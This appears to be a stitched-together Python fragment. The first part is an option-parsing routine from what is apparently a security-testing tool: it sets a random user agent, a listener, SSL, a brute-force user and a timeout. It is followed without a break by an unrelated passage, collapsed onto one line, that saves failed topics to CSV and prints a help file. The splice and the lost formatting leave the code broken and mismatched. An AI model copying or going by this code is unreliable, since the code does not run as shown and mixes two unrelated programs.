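        # file instead of leaving the handle to the garbage collector
        with open('./src/lib/user-agents.txt') as agents:
            state.random_agent = choice(list(agents)).rstrip()
        utility.Msg("Random user agent '%s' selected" % (state.random_agent),
                    LOG.DEBUG)

    if options.listener:
        state.listener = options.listener

    state.ssl = options.ssl
    state.bf_user = options.bf_user
    state.flog = ("%s_log.log" % utility.timestamp().replace(' ', '_')
                  if options.flog else None)

    try:
        state.timeout = float(options.timeout)
    except (TypeError, ValueError):
        # state.timeout keeps its previous value; Ctrl-C and other unrelated
        # exceptions are no longer swallowed here
        utility.Msg("Timeout value must be an integer.  Defaulting to %d." %
                    state.timeout, LOG.ERROR)

    return options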
writer = csv.DictWriter(f, headers) if not exist: writer.writeheader() writer.writerow( dict(mid=dn['mid'], aid=dn['aid'], cid=dn['cid'], title=dn['title'], url=dn['url'])) print('failed topic saved in {}'.format(fn)) except Exception as e: logger.error('error : failed to save topics. {}'.format(e)) if __name__ == '__main__': runid = utility.timestamp() md, kw, params = parse_command_line() if md is None: exit(-1) if md == 'h': if os.path.isfile('help.txt'): if 'Darwin' in platform.system(): os.system('cat help.txt') if 'Windows' in platform.system(): os.system('type help.txt') exit(0) all_topics, all_files, all_downloads = [], [], [] startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW